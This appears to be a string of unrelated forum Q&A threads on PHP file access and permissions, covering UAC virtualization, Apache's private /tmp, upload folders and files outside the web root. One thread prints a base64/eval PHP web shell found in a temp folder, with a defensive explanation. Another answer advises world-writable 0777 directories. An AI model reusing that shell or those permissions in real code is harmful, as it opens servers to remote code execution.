I have a REALLY strange thing happening! When I view a file (within the "Program Files (x86)" folder tree) in my file manager it has one content, but when I retrieve it through PHP CLI script using file_get_contents() it has different content (with some additional lines I added through the script earlier) - except if I run the CLI script in a prompt with admin rights, then I see the same content. How on earth is it possible that the same file can have different content based on the permissions of the user accessing the file? Is that really possible, and if so where can I find more information on how it works? I've never heard of such a thing in my 25+ years of computing and programming experience...
I have quadruple-checked that the path is the same, and checked in all kinds of ways that nothing else is playing a trick on me - but I just can't find any possible explanation!
I'm running Windows 10.
32-bit applications that do not have a requestedExecutionLevel node in their manifest are assumed to be UAC-unaware, and if they try to write to a privileged location in the file system or registry while the process is not elevated, the write operation is virtualized. Virtualized files are stored in %LocalAppData%\VirtualStore.
Manually delete the file in the virtual store and then edit the ACL/security of the file if you need to write to it from your script as a standard user...
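To see whether this is what's happening, a script can check whether a virtualized copy of the file exists alongside the "real" one. The helper below is only a sketch: virtualStorePath() is a name invented here, the example paths are made up, and the drive-letter handling is simplified.

```php
<?php
// Map a path under a protected location (e.g. "C:\Program Files (x86)\...")
// to the per-user VirtualStore copy that UAC file virtualization writes to.
// virtualStorePath() is a helper name invented for this sketch.
function virtualStorePath(string $path, ?string $localAppData = null): string
{
    $localAppData = $localAppData ?? getenv('LOCALAPPDATA');
    // Strip the drive prefix ("C:\") and prepend the VirtualStore root.
    $relative = preg_replace('/^[A-Za-z]:\\\\/', '', $path);
    return rtrim($localAppData, '\\') . '\\VirtualStore\\' . $relative;
}

$real    = 'C:\\Program Files (x86)\\MyApp\\settings.ini';       // example path
$virtual = virtualStorePath($real, 'C:\\Users\\me\\AppData\\Local');
echo $virtual, PHP_EOL;
// C:\Users\me\AppData\Local\VirtualStore\Program Files (x86)\MyApp\settings.ini

// On the affected machine you could then compare the two copies:
// if (file_exists($virtual)) { echo file_get_contents($virtual); }
```

If the VirtualStore copy exists and matches what the non-elevated script sees, file virtualization is the explanation.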
Ubuntu creates a separate /tmp directory for each user, so when Apache asks for /tmp it actually gets /tmp/systemd-private-654e145185f84f6ba097649873c88a9c-apache2.service-uUyzNh/tmp. (That code is different each time.) This is generally a good thing, but it’s annoying me now.
I want to create a bunch of PDF files (using TCPDF in PHP) in /tmp, then use shell_exec() in PHP to run the pdfunite script to create a single output PDF, then load that PDF into memory to serve it to the browser. My problem is that the pdfunite script doesn’t work, which I presume is because it’s not seeing the same path as the files are actually in.
Does PHP’s shell_exec() run code as the Apache user (www-data)? If so, I would assume that it would see the same /tmp dir, but in that case the pdfunite script should work. Is there a sensible workaround here, other than using a different directory and doing the cleanup myself?
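As a sketch of the "different directory plus manual cleanup" workaround mentioned above - the directory layout, file names, and the pdfunite invocation are illustrative assumptions, and the actual TCPDF writes are elided:

```php
<?php
// Sketch of a workaround: create the intermediate PDFs in a directory the
// script controls and pass absolute, quoted paths to the shell command,
// then clean up ourselves. If the private-/tmp remapping really is the
// problem, point $workDir at a directory your application owns instead of
// the system temp dir used here as a placeholder.
$workDir = sys_get_temp_dir() . '/pdf-merge-' . bin2hex(random_bytes(8));
mkdir($workDir, 0700, true);

$parts = [];
for ($i = 0; $i < 3; $i++) {
    $parts[] = $workDir . "/part{$i}.pdf";
    // ... write each TCPDF document to end($parts) here ...
}
$output = $workDir . '/combined.pdf';

// Quote every path; shell_exec() runs as the same user as PHP itself
// (www-data under Apache), so file permissions are consistent.
$cmd = 'pdfunite ' . implode(' ', array_map('escapeshellarg', $parts))
     . ' ' . escapeshellarg($output) . ' 2>&1';
// shell_exec($cmd);  // uncomment where pdfunite is actually installed

// Serve $output with readfile(), then remove the work directory:
array_map('unlink', glob($workDir . '/*'));
rmdir($workDir);
```

Capturing stderr with 2>&1 and echoing shell_exec()'s return value is also a quick way to see *why* pdfunite fails, rather than guessing at the path.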
This may sound like a pretty basic question, but I'm a bit stumped on what constitutes "reading" a file and what constitutes "executing" a file.
For example:
User 1 buys a ticket from an online website, and wants to view the ticket (as a jpeg), which is displayed on the website.
Is this considered to be "reading" the folder, or is this actually "executing" the folder?
If the user's permissions are set to "read only," that means the user CAN access the file via an action on the website (in this case, an image of their purchased ticket), but cannot access the file via a direct URL, right? Such as www.exampletickets.com/user1/tickets
Folder Permissions:
Execute -> actually enter that folder, but not be able to read its contents or see what files are located there
Read -> be able to read the folder's contents
Write -> edit the folder's data: delete or create new files/folders inside it, etc.
File Permissions:
Execute -> if it's a script like index.php, run it to get data from it
Read -> if it's a text file like index.html or index.php, be able to read it
Write -> ability to change its data
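The bits above can be demonstrated from PHP itself. This is a throwaway sketch - the directory and file names are arbitrary, and it cleans up after itself:

```php
<?php
// Demonstrate directory vs. file permission bits with a throwaway
// directory and file. chmod() sets the mode exactly (unlike mkdir(),
// whose mode argument is filtered by the process umask).
$dir  = sys_get_temp_dir() . '/perm-demo-' . getmypid();
$file = $dir . '/index.html';

if (!is_dir($dir)) {
    mkdir($dir);
}
chmod($dir, 0755);   // rwx owner, r-x group/others: they can enter and list,
                     // but not create or delete entries
file_put_contents($file, '<p>hello</p>');
chmod($file, 0644);  // rw- owner, r-- group/others: readable, not executable

clearstatcache();
$dirPerms  = fileperms($dir)  & 0777;
$filePerms = fileperms($file) & 0777;
printf("dir:  %o\nfile: %o\n", $dirPerms, $filePerms);  // dir: 755, file: 644

// Cleanup
unlink($file);
rmdir($dir);
```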
As for security, these permissions are only an issue when your server is accessible by users outside your team. That was mainly the case with shared hosting, where you didn't get a dedicated operating system: there was one operating system and all the users uploaded their data to it. If it was not correctly secured, they could view and edit each other's source code.
Today you usually get a dedicated (virtualized) server, with more security tools and an operating system accessible only by you.
So you don't need to worry that someone else will view or change your data, as you are the only one with access to that server.
The webserver (Apache, nginx, ...) serves image files by reading them, not executing them - the same goes for any other static files - regardless of whether they are accessed directly or not.
Also, Linux file permissions are enforced by the machine itself: the relevant user is the one running the webserver instance, usually a Linux user named something like "www-data". It has nothing to do with your website's users.
For more information (what are the perfect file and directory permission for your websites ?) -> https://serverfault.com/questions/345833/what-are-perfect-unix-permissions-for-usual-web-project-directories
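To confirm which system user your scripts actually run as, a short sketch like the following works. It assumes the posix extension is available (common on Linux builds), with a `whoami` shell fallback otherwise:

```php
<?php
// The permissions that matter are those of the user the webserver/PHP
// process runs as (e.g. "www-data"), not your website's logged-in users.
// One way to see that user from a script:
if (function_exists('posix_geteuid')) {
    $info = posix_getpwuid(posix_geteuid());
    $user = $info['name'];
} else {
    // Fallback when the posix extension is not loaded
    $user = trim((string) shell_exec('whoami'));
}
echo "PHP is running as: {$user}\n";
```

Note that get_current_user() is *not* equivalent: it returns the owner of the script file, not the user executing it.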
I have noticed that our temp directory has a number of what appear to be temporary files with names like phpA3F9.tmp
Looking into the contents, I find a number followed by some PHP code; the following code appears in several files:
9990000
<?php
$mujj = $_POST['z'];
if ($mujj!="") {
    $xsser=base64_decode($_POST['z0']);
    #eval("\$safedg = $xsser;");
}
?>
This appears to be an attack attempt, but I presume it relies on the attacker being able to execute the code in the tmp folder.
Can anybody explain what is going on here? What are the risks? How do these files get into the tmp folder? And how do I stop them?
I don't know if it is relevant but we are running PHP 5.5 on IIS
Short story: your server may have already been compromised.
Those are PHP shells - mostly harmless where they are, but if they get into your web root, they'll allow an attacker to execute arbitrary code on your server.
The key parts to understanding the shell are:
$xsser=base64_decode($_POST['z0']);
#eval("\$safedg = $xsser;");
It accepts arbitrary code from a $_POST variable, base64_decodes it, and passes the result to eval. (Note that in the sample as posted, the eval line starts with #, which PHP actually treats as a line comment; live variants typically use @eval, where the @ really does suppress errors.)
It's possible that they're being uploaded through a form on your site, and getting dumped in the temp folder as an intermediate step, with the hope that they would get moved into a web-accessible location. The other option is that there's already a shell or rootkit on your server, and it's putting those files in any writable folders that it can find.
So what to do about it? Check your server logs - if you see any successful connections to a script that you don't recognize, you may be compromised. Look for any upload forms on your site and lock them down (require user authentication, etc.). If you're certain you've been compromised, don't bother trying to clean the machine: spin up a new server and migrate your clean code, important files, and data to it.
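The single obfuscation layer in the shell is easy to see with a harmless payload. This sketch mirrors the decode step only - nothing here calls eval, and the sample payload is invented for illustration:

```php
<?php
// How the shell's obfuscation works: the attacker POSTs base64-encoded
// PHP in z0, the script decodes it and hands it to eval.
// Decoding a harmless sample payload (no eval here, of course):
$posted  = base64_encode('phpinfo();');  // what an attacker might send as z0
$decoded = base64_decode($posted);
echo $decoded, PHP_EOL;                  // phpinfo();

// The dangerous step in the dropped file then effectively becomes:
//   eval("\$safedg = phpinfo();");
// i.e. arbitrary code execution with the webserver's privileges.
```

Because the payload travels base64-encoded, naive signature scans of the request body won't spot the PHP source - only the innocuous-looking z0 parameter.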
So I created a couple of directories and files over FTP, so their owner is the username I use to log in to the server. Now I'd like to allow users of the website to upload images to those directories. Unfortunately, for the website to store images, they need to be owned by Apache. How can I fix this? I've been reading around on this but can't find a direct answer.
I don't have SSH, so I guess all command-line-things are not applicable for me.
Edit
I tried making the folders again as Apache, but now of course I can't write any files into those directories over FTP.
Provided that at least one directory is writeable by the apache user (let's call this directory 'writeabledir'; it may be your root dir '/'), you must delete the folders you created via FTP and create a PHP script to create the directories you need.
If, for example, you want a directory called users and inside it another directory called upload:
Create a file makedirs.php on your server.
<?php
$oldumask = umask(0);
mkdir("writeabledir/users/upload",0777,true); // or even 01777 so you get the sticky bit set
umask($oldumask);
?>
Now run makedirs.php once by visiting your.serv.er/makedirs.php in your browser.
EDIT:
If you don't want to delete and recreate your directories, you could always try to change the permissions from FTP.
For example, with FileZilla, just right-click the desired folder and set its permissions to 777. If your FTP user doesn't have permission to do this, then there is no other way except asking an administrator to do it for you.
EDIT2:
Added umask to ensure that folders created by apache are writeable by everyone (taken from http://us3.php.net/manual/en/function.mkdir.php#1207).
Friend, look - I work in PHP; the solution varies a bit between versions, but the most common approach for what you want to store is to create a database and import it into your code. That also works for any images you want to place. The wisest thing to do is create a database with the fields necessary for your purpose, import it, and put the images in a directory of your project. I'd also advise using Aptana Studio 3, which greatly simplifies writing code, among many other things, and downloading XAMPP, which already comes with Apache integrated - it will help you a lot. For any questions about installation, just look on YouTube.
I was reading some posts about how to include files outside the PHP root (the Apache document root). I guess just reading a file is an easier task and may be done with the same solution. But I do not intend to put PHP or any other script files outside my document root (currently /Library/WebServer/Documents/); I wish to keep a single root with the usual configuration.
But any file outside the root is not "visible"; it's as if my whole HD consisted of just the root. PHP does not return a permissions error - it returns "file doesn't exist" (or "is not a directory"). That's good security practice, but it makes my scripts blind! I have a small intranet, and one task I wish to do is read Safari's bookmarks file (Bookmarks.plist); I also wish to make a photo viewer, etc.
So I just want to read those files. Is there some hack for this?
EDIT: I was using file_get_contents. Following suggestions, I tried include, which stops with permission issues (probably an ownership issue). I did a test with a simple file on a Volume (an external HD) and it included just fine. However, I'm thinking about how to deal with the data - I was expecting to read the XML and work on it...
EDIT 2: file_get_contents is working with a file on an external HD, so the problem seems to be about file permissions/ownership. The info window shows the same users for both files: me, staff, and everyone, all with at least read permission. Maybe there is some "hidden" user... any hacker around?
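One common cause of exactly this symptom - readable file, but PHP reports it doesn't exist with no permission error - is PHP's open_basedir setting, which confines all file access to a whitelist of directories. A small diagnostic sketch (the Bookmarks.plist path is hypothetical):

```php
<?php
// Narrow down why file_get_contents() claims a file "doesn't exist"
// for a path outside the document root. The path is an example only.
$path = '/Users/me/Library/Safari/Bookmarks.plist';  // hypothetical target

var_dump(ini_get('open_basedir'));  // non-empty => PHP confines all file
                                    // access to the listed directories and
                                    // reports other paths as nonexistent

clearstatcache();
var_dump(file_exists($path));       // false can also mean "not allowed to stat"
var_dump(is_readable($path));       // checks the PHP/webserver user's rights

if (file_exists($path)) {
    printf("perms: %o\n", fileperms($path) & 0777);
}
```

If open_basedir is set, adding the needed directory to its list (in php.ini or the vhost config) is the supported fix; the "hidden user" in this case is just the user Apache runs as, whose rights differ from yours in the Finder.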